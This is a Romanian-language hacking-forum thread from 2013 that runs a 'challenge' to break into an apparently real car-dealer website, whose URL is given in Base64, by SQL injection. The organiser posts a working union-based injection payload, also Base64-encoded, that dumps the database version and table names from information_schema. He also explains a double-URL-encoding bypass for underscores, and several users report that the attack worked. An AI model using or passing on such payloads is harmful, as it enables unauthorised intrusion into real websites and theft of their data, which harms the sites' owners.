Renegade Posted August 7, 2013 Report Share Posted August 7, 2013 (edited) TargetaHR0cDovL3d3dy5jaXRyb2VuLXNhaW50bG91aXMuY29tL2ZyL2Rpc3RyaWJ1dGV1ci1jaGF0ZW5ldC9jaGF0ZW5ldF82Nzg=Base64Tasks:display version with your namedisplay table names from primary databaseremove commas after table name (as in picture)Proof: Rules:use union select based SQLipost picture as proofsend me your command to PMSolvers:- Hannibal.- Todo- ajkaro- danyweb09Rezolvare:aceasta este syntaxa meaaHR0cDovL3d3dy5jaXRyb2VuLXNhaW50bG91aXMuY29tL2ZyL2Rpc3RyaWJ1dGV1ci1jaGF0ZW5ldC9jaGF0ZW5ldF82NzgnIGFuZCBmYWxzZSBVTklPTiBTRUxFQ1QgMSwyLDMsNCwweDUyNjU2ZTY1Njc2MTY0NjUsdmVyc2lvbigpLDcsOCxjb25jYXQocmVwbGFjZShncm91cCUyNTVmY29uY2F0KHRhYmxlJTI1NWZuYW1lLDB4M2M2MjcyM2UpLCcsJywnJykpLDEwLDExLDEyLDEzLDE0LDE1LDE2LDE3LDE4LDE5LDIwLDIxLDIyLDIzIGZyb20gaW5mb3JtYXRpb24lMjU1ZnNjaGVtYS50YWJsZXMgd2hlcmUgdGFibGUlMjU1ZnNjaGVtYT1kYXRhYmFzZSgpLS0gLQ==Base64pentru injectie am folosit 'pentru comentara ei am folosit -- -pentru bypass la _ am folosit %255f,adica: _ si il treceti in hex,astfel devine %5f iar apoi %5f in urlencodepentru inlocuirea virgulei de dupa tabele eu am folosit "replace"challenge closed Edited September 25, 2013 by Renegade Quote Link to comment Share on other sites More sharing options...
Hannibal. Posted August 7, 2013 Report Share Posted August 7, 2013 Cam asa ceva?Scuza-ma ca am postat asa tarziu, acum m-am trezit:">Multumesc pentru challenge. Quote Link to comment Share on other sites More sharing options...
Todo Posted August 7, 2013 Report Share Posted August 7, 2013 (edited) Edited August 7, 2013 by Todo Quote Link to comment Share on other sites More sharing options...
ajkaro Posted August 8, 2013 Report Share Posted August 8, 2013 (edited) Nice challenge...:-) Edited August 8, 2013 by ajkaro Quote Link to comment Share on other sites More sharing options...
Active Members dancezar Posted August 8, 2013 Active Members Report Share Posted August 8, 2013 (edited) Multumesc mult pentru challenge.Initial am crezut ca e foarte usor dar nu prea a fost:))Chiar am invatat ceva:)Imediat vin cu un edit sa las un screenshot//Gatahttp://s23.postimg.org/cue9sdxt7/rsz_screenshot_3.png Edited August 8, 2013 by danyweb09 Quote Link to comment Share on other sites More sharing options...
XoddX Posted August 8, 2013 Report Share Posted August 8, 2013 Am ajuns pana la tabele...ma poate ajuta cineva cu ele? Am incercat diferite "chestii" dar nu am reusit. Vreau sa ma ajutati pentru incultura mea generala nu pentru CH.Astept un PM va rog. Multumesc. Quote Link to comment Share on other sites More sharing options...
Renegade Posted August 8, 2013 Author Report Share Posted August 8, 2013 Am ajuns pana la tabele...ma poate ajuta cineva cu ele? Am incercat diferite "chestii" dar nu am reusit. Vreau sa ma ajutati pentru incultura mea generala nu pentru CH.Astept un PM va rog. Multumesc.voi posta rezolvarea la final.mai incearca,nu te da batut.baftautilizeaza cu incredere cursurile academieihttp://pentesting-academy.com/MySQLiacademy/lv1.php?id=1 Quote Link to comment Share on other sites More sharing options...
XoddX Posted August 10, 2013 Report Share Posted August 10, 2013 Se poate rezolvarea? Am reusit sa extrag toate alea dar nu pot sa scot acele virguli. So? Quote Link to comment Share on other sites More sharing options...
Hannibal. Posted August 10, 2013 Report Share Posted August 10, 2013 *** hint ***ai cautat cumva pe net un tabel cu valoarea hex pentru newline? Quote Link to comment Share on other sites More sharing options...
Renegade Posted August 10, 2013 Author Report Share Posted August 10, 2013 o sa postez diseara rezolvarea.pana atunci un hint.inlocuiti _ cu %255f.de unde %255f ???luati _ si il treceti in hex,astfel devine %5f iar apoi %5f in urlencodeinsa pe langa asta mai trebuie sa eliminati , la afisare tabelelor pentru a fi trecuti la solvers.succes Quote Link to comment Share on other sites More sharing options...
XoddX Posted August 10, 2013 Report Share Posted August 10, 2013 Asta am facut insa mai trb sa elimin " , " si CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS Quote Link to comment Share on other sites More sharing options...
Renegade Posted August 10, 2013 Author Report Share Posted August 10, 2013 nu e bine.pana in ora 8 incerc sa pun rezolvarea explicata.sunt pe tel acum Quote Link to comment Share on other sites More sharing options...